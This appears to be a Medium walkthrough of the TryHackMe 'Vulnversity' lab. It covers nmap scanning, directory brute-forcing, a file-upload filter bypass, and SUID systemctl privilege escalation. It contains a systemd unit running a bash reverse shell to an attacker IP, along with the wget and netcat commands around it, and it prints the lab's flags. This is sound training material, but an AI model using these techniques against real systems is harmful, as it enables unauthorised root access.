Open in app

Sign in

Write

Sign in

Walkthrough : Vulnversity

shiv shankar yadav
6 min readApr 14, 2023

Vulnversity is esay difficulty vulnerable lab of try hack me having a good knowledge of web application active recon using nmap and service enumeration , web application attack (file upload vulnerability) and previliege escalation.

Task 2 : Reconnaissance

What is Reconnaissance ?

Reconnaissance, also known as recon, is the initial phase of the information-gathering process in cybersecurity. It involves collecting information about a target system or network in order to identify potential vulnerabilities and attack vectors. The goal of reconnaissance is to gather as much information as possible about the target, without alerting the target to the fact that an attack is being planned or conducted.

Reconnaissance can be done through a variety of methods, including:

  1. Passive Reconnaissance: This involves collecting information about the target system or network through public sources of information, such as social media, websites, and search engines.
  2. Active Reconnaissance: This involves actively probing the target system or network to collect information through methods such as port scanning, vulnerability scanning, and network mapping.
  3. Human Reconnaissance: This involves gathering information through social engineering techniques, such as phishing, pretexting, and impersonation.

Reconnaissance is a critical step in the cybersecurity process because it allows attackers to understand the target system or network and identify potential vulnerabilities or weaknesses that can be exploited. Conversely, reconnaissance can also be used by defenders to identify potential attack vectors and shore up defenses before an attack occurs.

Gather information about this machine using a network scanning tool called nmap.

What is NMAP?

nmap is an free, open-source and powerful tool used to discover hosts and services on a computer network. In our example, we are using nmap to scan this machine to identify all services that are running on a particular port. nmap has many capabilities, below is a table summarising some of the functionality it provides.

Scan this box: nmap -sV <machines ip>

There are many nmap “cheatsheets” online that you can use too.

nmap flag Description
-sV Attempts to determine the version of the services running
-p <x> or -p- Port scan for port <x> or scan all ports
-Pn Disable host discovery and just scan for open ports
-A Enables OS and version detection, executes in-build scripts for further enumeration 
-sC Scan with the default nmap scripts
-v Verbose mode
-sU UDP port scan
-sS TCP SYN port scan

Ques : Scan the box, how many ports are open?

Answer : 6

Ques : What version of the squid proxy is running on the machine?

Answer : 3.5.12

Ques : How many ports will nmap scan if the flag -p-400 was used?

Answer : 400

Ques : Using the nmap flag -n what will it not resolve?

Answer : DNS

Ques : What is the most likely operating system this machine is running?

Answer : Ubuntu

Ques : What port is the web server running on?

Answer : 3333

Task 3 : Locating directories using GoBuster

Using a fast directory discovery tool called GoBuster you will locate a directory that you can use to upload a shell to.

GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

Download GoBuster here, or if you’re on Kali Linux 2020.1+ run sudo apt-get install gobuster

To get started, you will need a wordlist for GoBuster (which will be used to quickly go through the wordlist to identify if there is a public directory available. If you are using Kali Linux you can find many wordlists under /usr/share/wordlists.

Now lets run GoBuster with a wordlist: gobuster dir -u http://10.10.27.213:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

GoBuster flagDescription
e Print the full URLs in your console
-u The target URL-wPath to your wordlist
-U and -PUsername and Password for Basic Auth
-p <x>Proxy to use for requests
-c <http cookies>Specify a cookie for simulating your auth

Ques : What is the directory that has an upload form page?

/internal/

Task 4 : Compromise the webserver

Now we have found a form to upload files, we can leverage this to upload and execute our payload that will lead to compromising the web server.

Ques : What common file type, which you’d want to upload to exploit the server, is blocked? Try a couple to find out.

.php

To identify which extensions are not blocked, we’re going to fuzz the upload form.

We’re going to use Intruder (used for automating customised attacks).

To begin, make a wordlist with the following extensions in:

Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on “Payloads” and select the “Sniper” attack type.

Run this attack, what extension is allowed?

.phtml

Now we know what extension we can use for our payload we can progress.

We are going to use a PHP reverse shell as our payload. A reverse shell works by being called on the remote host and forcing this host to make a connection to you. So you’ll listen for incoming connections, upload and have your shell executed which will beacon out to you to control!

Download the following reverse PHP shell here.

To gain remote access to this machine, follow these steps:

  1. Edit the php-reverse-shell.php file and edit the ip to be your tun0 ip (you can get this by going to http://10.10.10.10 in the browser of your TryHackMe connected device).
  2. Rename this file to php-reverse-shell.phtml
  3. We’re now going to listen to incoming connections using netcat. Run the following command: nc -lvnp 4444
  4. Upload your shell and navigate to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml — This will execute your payload
  5. You should see a connection on your netcat session

What is the name of the user who manages the webserver?

bill

What is the user flag?

8bd7992fbe8a6ad22a63361004cfcedb

Task 5 : Privilege Escalation

Now you have compromised this machine, we are going to escalate our privileges and become the superuser (root).

In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

On the system, search for all SUID files. What file stands out?

/bin/systemctl

On Attacker Machine :

save this file as root.service and send it to victim machine through python web service .

[Unit]
Description=roooooooooot
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.13.23.241/9999 0>&1'
[Install]
WantedBy=multi-user.target

python3 -m http.service 80

On Victim Machine

wget http://10.13.23.241/root.service

systemctl start root.service

and running netcat listener on attacker machine

nc -nlvp 9999

Its challenge time! We have guided you through this far, are you able to exploit this system further to escalate your privileges and get the final answer?

Become root and get the last flag (/root/root.txt)

a58ff8579f0a9270368d33a9966c7fd5

--

--

shiv shankar yadav

Written by shiv shankar yadav

0 Followers

I am a certified ethical hacker (CEH) and a certified red team professional (CRTP) with a strong background in active directory and web penetration testing.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams